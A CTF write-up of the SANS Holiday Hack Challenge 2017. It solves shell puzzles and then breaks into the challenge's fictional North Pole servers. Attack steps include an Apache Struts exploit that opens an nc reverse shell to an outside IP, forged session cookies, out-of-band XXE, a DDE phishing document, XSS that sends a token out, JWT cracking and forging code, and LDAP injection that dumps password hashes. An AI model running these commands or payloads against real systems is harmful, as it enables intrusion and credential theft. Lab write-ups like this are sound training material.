SANS Holiday Hack 2017 Writeup
The following is my writeup for The SANS Holiday Hack Challenge of 2017. I took my time with it this year, playing casually throughout the holiday season, and had a great time. The scoreboard doesn't take into account when people completed the challenges, which put me in a tie for first that I thought was pretty cool. In the following article I will go over the 8 Cranberry Pi challenges, the 9 questions of The Story, and a writeup of hacking the snowball physics games. All that said, this is a pretty long writeup filled with tons of screenshots, so I hope you enjoy. I also want to give a big shout out to FADEC0D3 and point to his writeup, as he was one of the first people to complete HHC, a huge help to me personally, and his post came out beautifully in the markdown format.
Cranberry Pis
Once you get into the game, there are multiple levels that involve a physics engine and rolling a ball around a map to hit several points along the way. Along with these games, each level contains a "Cranberry Pi", a hacking challenge that upon completion gives you new abilities in the snowball game and hints for the 9 Story questions. I solved all of the Cranberry Pis and snowball games first, before diving into the 9 questions from The Story.
Winter Wonder Landing / Bushy Evergreen
The goal of this challenge is to find a binary named elftalkd and run it. The find command on the PATH is built for the wrong system architecture, but another find binary exists on the system; locating that one and running it instead does the job.
Cryokinetic Magic / Holly Evergreen
In this challenge one needs to run a binary they have read access to, but not execute access. The dynamic loader (ld-linux.so.2) will load and run any ELF it is given as an argument, regardless of the file's execute bit, so we can copy the file into /tmp and invoke it through the loader.
There's Snow Place Like Home / Pepper Minstix
In this challenge we need to run an ARM binary on an Intel x86_64 system, which can be done with the qemu-arm user-mode emulator.
Cliffs of Winsanity / Sparkle RedBerry
In this challenge one needs to kill a running process, but an alias has been set that stops the kill command from working unless it is invoked by its full path.
Bumbles Bounce / Minty CandyCane
This challenge is all about parsing and sorting web access logs to find the least common browser User-Agent.
I Don’t Think We’re In Kansas Anymore / Sugarplum Mary
In this challenge one needs to query a SQLite database, joining two tables, to find the most liked song.
Oh Wait! Maybe We Are… / Shinny Upatree
In this challenge one can run the find command as a privileged user, and needs to use that (find can run commands via -exec, with the same privileges) to restore a shadow file they normally can't write to.
We’re Off To See The / Wunorse Openslae
In this challenge one needs to use LD_PRELOAD to hijack the rand() function.
The Story Questions
This part involved answering several questions asked in the story, which ultimately meant exploiting a public server and pivoting into an internal network to hack further servers there.
1 ✓
Q1) Visit the North Pole and Beyond at the Winter Wonder Landing Level to collect the first page of The Great Book using a giant snowball. What is the title of that page?
A1) About This Book ...
First page is located at:
https://www.holidayhackchallenge.com/2017/pages/6dda7650725302f59ea42047206bd4ee5f928d19/GreatBookPage1.pdf
One gets this link simply by rolling the snowball over The Great Book page in the game. There is another level where you pick up a Great Book page the same way.
2 ✓
Q2a) Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server?
A2a) On the topic of Flying Animals
Q2b) What is Alabaster Snowball's password?
A2b) alabaster_snowball : stream_unhappy_buy_loss
Investigating the l2s host leads to a dev page (dev.northpolechristmastown.com) running Apache Struts, which is vulnerable to the REST plugin XStream deserialization RCE (CVE-2017-9805), exploit-db 42627: https://www.exploit-db.com/exploits/42627/
Running the following command (once our listener is set up) puts us on the box:
python 42627.py https://dev.northpolechristmastown.com/orders/1708 "nc -e /bin/bash 13.37.9.246 7777"
Got a shell!
Once on the box we can investigate the files in the web root, where we find a file containing Alabaster's password:
From here one can use Alabaster's username and password to log into the box over SSH instead of re-running the Apache Struts exploit.
3 ✓
Q3) The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?
A3) FileStor
One can run a scan from the SSH bastion for SMB servers on the internal network:
alabaster_snowball@l2s:/tmp/asnow.eG04WwYgkRFZ50HlgBKBiFv8$ nmap -sV -sC -Pn -n -p445 10.142.0.0/23
Which gives the following (edited) scan results:
10.142.0.7
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_nbstat: NetBIOS name: HHC17-EMI, NetBIOS user: , NetBIOS MAC: 42:01:0a:8e:00:07 (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
Using SSH, one can set up a local port forward through the bastion and then connect to the SMB server (10.142.0.7 from the scan above) via localhost. The command below is a plain -L port forward rather than a SOCKS proxy; sudo is needed because binding local port 445 requires root, and it will fail if something on the local machine already listens on 445:
sudo ssh -L :445:10.142.0.7:445 alabaster_snowball@dev.northpolechristmastown.com
Then all one needs to do is list out everything the current user has access to:
smbmap -H 127.0.0.1 -R -u alabaster_snowball -p stream_unhappy_buy_loss
Followed by recursively downloading all of the files in the share:
smbget -R -U alabaster_snowball smb://127.0.0.1/FileStor/
4 ✓
Q4) Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?
A4) Munchkins formed the Lollipop Guild and have Munchkin moles infiltrating the North Pole.
I started this challenge by scanning the mail server:
This led me to the webserver on port 3000, and while browsing it I also gleaned the email address format:
Browsing to mail.northpolechristmastown.com/cookie.txt brings one to a page describing how the session cookies are generated:
The check decrypts the ciphertext field and compares the result with the plaintext field from the same cookie, so both sides of the comparison are attacker-controlled. Running that code with an empty plaintext and truncating the ciphertext to 16 bytes (which the server consumes entirely as the IV, leaving nothing to decrypt) gives the following cookie, which lets you log in as alabaster:
'{"name":"alabaster.snowball@northpolechristmastown.com","plaintext":"","ciphertext":"Iyn4VsDfzqw0VSUI5zBE6g"}'
Once we set our cookie to this, we are logged in as Alabaster, and going through his mailbox reveals the Great Book page:
5 ✓
Q5a) How many infractions are required to be marked as naughty on Santa's Naughty and Nice List?
A5a) 4 separate infractions, regardless of severity, date, or status.
Q5b) What are the names of at least six insider threat moles?
A5b) Boq Questrian, Bini Aru, Beverly Khalil, Manuel Graham, Charmaine Joseph, Wesley Morton.
Q5c) Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?
A5c) Abominable Snow Monster, found in our conversation with Sam.
Using the sheets we found in the SMB share compared with the data hosted on the NPPD site:
We can use the Naughty and Nice List to select Naughty individuals and look them up in the NPPD system. Similarly, one can do this with Nice individuals, and a pattern emerges quickly: Naughty individuals have far more infractions (regardless of severity, date, or status). To find more moles one can use the two provided in the BOLO report to look up other people with the same infractions of throwing rocks and pulling hair. This gives a bunch of potential moles, however I picked a few that jumped out to me as Munchkins. Finally, we find out who has been throwing the snowballs in our first NPC conversation with Sam and Bumble.
6 ✓
Q6) The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?
A6) The Dreaded Inter-Dimensional Tornadoes.
Navigating to the EaaS server, one can tell it is an IIS server, which matches the hint about XXE in IIS/.NET. The server lets one download the elf list, reset it, and upload a new XML with elf info inside.
One can upload an XML whose DOCTYPE references a remote DTD file that we host:
The remote DTD defines an entity that reads the local file (C:\greatbook.txt) and another that sends its contents back to our webserver in a request, i.e. out-of-band XXE:
Giving us the page!
7 ✓
Q7) Like any other complex SCADA systems, the North Pole uses Elf-Machine Interfaces (EMI) to monitor and control critical infrastructure assets. These systems serve many uses, including email access and web browsing. Gain access to the EMI server through the use of a phishing attack with your access to the EWA server. Retrieve The Great Book page from C:\GreatBookPage7.pdf. What does The Great Book page describe?
A7) The Witches of Oz! After the great schism, no witches have gone to the North Pole.
To start this challenge one needs to log back into the mail server. Once there, you can search Alabaster's email for a message from Jessica Claus regarding a cookie recipe that he says he would open no matter what. Sounds like the perfect opportunity to phish Alabaster. I logged into the mail server as Jessica.Claus@northpolechristmastown.com by generating a new cookie for her with the same trick as before.
We will be sending the email titled: “gingerbread cookie recipe”, from Jessica.
For the payload we will use a Word DDEAUTO field rather than a more traditional Word macro attack (DDE needs no macro-enabled document, only the user clicking through Word's prompts):
Which gives us a reverse shell and access to the system:
8 ✓
Q8) Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?
A8) The Wizard of Oz
Again you set up an SSH port forward, this time to the edb server, and browse to localhost:8080, where you see both a login portal and a password reset page. The session token is kept in localStorage rather than a cookie, and the password reset flow is vulnerable to XSS (the hit in the log below comes from a headless PhantomJS browser viewing the reset ticket), so you need to XSS the following value out: localStorage.getItem("np-auth")
One can use this payload to send the np-auth value to our webserver:
Getting the result (the raw log entry from our web server):
35.196.239.128 - - [30/Dec/2017:00:14:15 +0000] "GET /?cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1" 200 331 "http://127.0.0.1/reset_request?ticket=4IH2X-CPZX0-5XF12-JWFBA" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
This is a JWT. The header and payload are only base64url-encoded and can be decoded trivially, but a modified token can't be re-signed without the secret used for the HMAC. The secret is weak, though, so one can crack it offline:
Now we can use the cracked secret to forge our own tokens: 3lv3s
The captured token expired in August 2017, so changing the expiration date, re-encoding the payload, and signing it with the secret gives us a new token the server accepts.
One can set this token from the JavaScript console to get logged into the app:
localStorage.setItem('np-auth', "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.gr2b8plsmw_JCKbomOUR-E7jLiSMeQ-evyYjcxCPXco");
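To make the decode / crack / forge steps concrete, here is an added Python example (my own code, not the author's tooling, standard library only) that takes the token captured in the log above, recovers the signing secret from a small constructed wordlist standing in for a real one, and re-signs the payload with a later expiry. The wordlist contents and the helper names are assumptions for illustration; only the captured token comes from the page.

```python
import base64
import hashlib
import hmac
import json

# Alabaster's expired session token, as captured in the web server log above.
CAPTURED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9."
    "M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I"
)

# Constructed stand-in for a wordlist; a real crack would iterate a file such as rockyou.txt.
SAMPLE_WORDLIST = ["secret", "password", "elves", "northpole", "3lv3s", "santa"]


def b64url_decode(s):
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_token(token):
    """Return (header, payload) dicts. No secret needed: these parts are not encrypted."""
    header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def sign(signing_input, secret):
    """HS256 signature: HMAC-SHA256 over 'header.payload', base64url without padding."""
    return b64url_encode(hmac.new(secret.encode(), signing_input, hashlib.sha256).digest())


def verify(token, secret):
    header, payload, sig = token.split(".")
    expected = sign("{}.{}".format(header, payload).encode(), secret)
    return hmac.compare_digest(expected, sig)


def crack_secret(token, wordlist):
    """Offline dictionary attack: the token is its own oracle, so every guess is free."""
    for candidate in wordlist:
        if verify(token, candidate):
            return candidate
    return None


def forge(token, secret, **claims):
    """Re-issue the captured token with claims overridden, signed with the recovered secret."""
    header, payload = decode_token(token)
    payload.update(claims)
    # Compact separators match what JWT libraries emit; dict order keeps the original key order.
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    return "{}.{}.{}".format(h, p, sign("{}.{}".format(h, p).encode(), secret))


if __name__ == "__main__":
    hdr, claims = decode_token(CAPTURED_TOKEN)
    print("alg:", hdr["alg"], "uid:", claims["uid"], "expires:", claims["expires"])
    secret = crack_secret(CAPTURED_TOKEN, SAMPLE_WORDLIST)
    print("recovered secret:", secret)
    print("forged:", forge(CAPTURED_TOKEN, secret, expires="2018-08-16 12:00:47.248093+00:00"))
```

The defensive takeaway is the same one the crack relies on: with HS256 the signature is an offline oracle, so the secret must be long and random (or use an asymmetric algorithm), and a bearer token in localStorage is readable by any script that runs on the origin.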
Once logged into the app, it becomes apparent that it's an LDAP search utility. Next one can perform LDAP injection in the search to reveal people in LDAP, like the Clauses, who you can't search for by default. Using the LDAP injection string from the SANS article:
))(department=it)(|(cn=
Which lists out the Clauses:
Now one can forge a new token with the Clauses' LDAP data (uid santa.claus, ou claus, dept administrators) and a new expiration date:
This lets one authenticate as Santa Claus and choose the Santa Panel option, but then you are presented with a Santa password prompt. Turning the previous LDAP injection into a curl request and adding userPassword to the requested attributes dumps all of the user hashes from LDAP:
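Why that particular string works is easier to see with the filter written out. The following is an added Python example (mine, not the EDB server's code, which the page does not show): it assumes a filter template of the shape the payload implies, two substring matches ANDed with the ou and ORed together, and parses the resulting filter to show where the injected parentheses land. It also goes one step further than the page and shows the fix, RFC 4515 value escaping, which keeps the injected text inside a single attribute value. The template, the parser and the function names are illustration assumptions.

```python
# Hypothetical filter template of the shape the injection payload implies
# (assumed for illustration; the real server-side template is not on the page).
FILTER_TEMPLATE = "(|(&(gn=*{name}*)(ou={ou}))(&(sn=*{name}*)(ou={ou})))"

# The injection string used against the EDB search, verbatim from the writeup.
INJECTION = "))(department=it)(|(cn="


def build_filter_vulnerable(name, ou="elf"):
    """String concatenation: user input can close the enclosing filter components."""
    return FILTER_TEMPLATE.format(name=name, ou=ou)


def escape_filter_value(value):
    """RFC 4515 escaping of the characters that can change filter structure."""
    out = []
    for ch in value:
        if ch in "\\*()\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def build_filter_safe(name, ou="elf"):
    """Same template, but every user-supplied value is escaped before substitution."""
    return FILTER_TEMPLATE.format(name=escape_filter_value(name), ou=escape_filter_value(ou))


def parse_filter(s):
    """Parse a search filter into nested tuples:
    ('&', [children]), ('|', [children]), ('!', child) or ('leaf', 'attr=value').
    Raises ValueError on unbalanced parentheses or trailing data."""

    def parse(i):
        if i >= len(s) or s[i] != "(":
            raise ValueError("expected '(' at offset %d" % i)
        i += 1
        if s[i] in "&|":
            op, i, children = s[i], i + 1, []
            while i < len(s) and s[i] == "(":
                node, i = parse(i)
                children.append(node)
            if i >= len(s) or s[i] != ")":
                raise ValueError("unterminated '%s' component" % op)
            return (op, children), i + 1
        if s[i] == "!":
            node, i = parse(i + 1)
            if i >= len(s) or s[i] != ")":
                raise ValueError("unterminated '!' component")
            return ("!", node), i + 1
        end = s.find(")", i)
        if end < 0:
            raise ValueError("unterminated leaf")
        return ("leaf", s[i:end]), end + 1

    node, i = parse(0)
    if i != len(s):
        raise ValueError("trailing data after filter: %r" % s[i:])
    return node


def top_level_branches(filter_str):
    """Children of the outermost component: the intended template has exactly two."""
    node = parse_filter(filter_str)
    return node[1] if node[0] in "&|" else [node]


if __name__ == "__main__":
    vuln = build_filter_vulnerable(INJECTION)
    print("vulnerable:", vuln)
    # The outer OR now has six branches, one of them the injected (department=it),
    # so the directory returns entries the ou=elf restriction was meant to hide.
    print("branches:", len(top_level_branches(vuln)))
    safe = build_filter_safe(INJECTION)
    print("escaped:   ", safe)
    print("branches:", len(top_level_branches(safe)))
```

Escaping is the right fix regardless of which template the server really used, because it removes the only characters that can alter filter structure; restricting the requested attributes server-side (so a client cannot ask for userPassword) is the separate fix for the hash dump that follows.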
curl 'http://localhost:8080/search' -H 'Host: localhost:8080' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://localhost:8080/home.html' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'np-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiYWRtaW5pc3RyYXRvcnMiLCJvdSI6ImNsYXVzIiwiZXhwaXJlcyI6IjIwMTgtMDgtMTYgMTI6MDA6NDcuMjQ4MDkzKzAwOjAwIiwidWlkIjoic2FudGEuY2xhdXMifQ.RA0Tx0E9R2vEv4depfPzm2d_ZH2_wzoYfDtFQAmtC9c' -H 'X-Requested-With: XMLHttpRequest' -H 'DNT: 1' -H 'Connection: keep-alive' --data 'name=))(department%3Dit)(%7C(cn%3D&isElf=True&attributes=uid%2CuserPassword'
Focusing on just Santa's hash:
["cn=santa,ou=human,dc=northpolechristmastown,dc=com",
{
"uid": ["santa.claus"],
"userPassword": ["d8b4c05a35b0513f302a85c409b4aab3"]
}
]
This is an unsalted MD5, so rather than cracking it one can simply look it up with the SANS ISC reverse hash tool, which gives the password: https://isc.sans.edu/tools/reversehash.html
md5 hash d8b4c05a35b0513f302a85c409b4aab3 = 001cookielips001
Using this password in the Santa Panel reveals a letter to Santa from The Wizard of Oz:
9 ✓
Q9) Which character is ultimately the villain causing the giant snowball problem. What is the villain's motive?
A9) Glinda, the Good Witch
After collecting 5 of the 7 pages from the Great Book and completing all of the snowball rolling levels, one unlocks the second NPC conversation, in which Glinda confesses her evil plan.
Hacking the Snowball Game Maps
Looking at vendor.js in the browser debugger, one can set a breakpoint on line 11293, at the following code:
key: "getDropper" : #getDropper
Once this breakpoint is triggered, run the following command in the JavaScript console:
this.scene.debugLayer.show()
Then resume script execution on the page, which displays the engine's debug layer:
This debug layer lets us manipulate the scene's objects however we want, including moving waypoints and seeing through certain objects.
Done! The following is my achievements bar, showing I completed all of the scoreable events in the game, and I had a great time along the way:
In the weeks leading up to SANS Holiday Hack there were tweets by Ed Skoudis and SANS, many of which were directly applicable to the CTF itself. I used almost all of these links throughout the challenge, and have included them at the end of the article for reference.
SQL Stuff:
https://pen-testing.sans.org/blog/2017/12/09/your-pokemon-guide-for-essential-sql-pen-test-commands/
XXE in IIS:
https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities
LD_Preload:
https://pen-testing.sans.org/blog/2017/12/06/go-to-the-head-of-the-class-ld-preload-for-the-win
Tinkering w/ Public Exploits:
https://pen-testing.sans.org/blog/2017/12/05/why-you-need-the-skills-to-tinker-with-publicly-released-exploit-code
Web Based LDAP Exploitation:
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap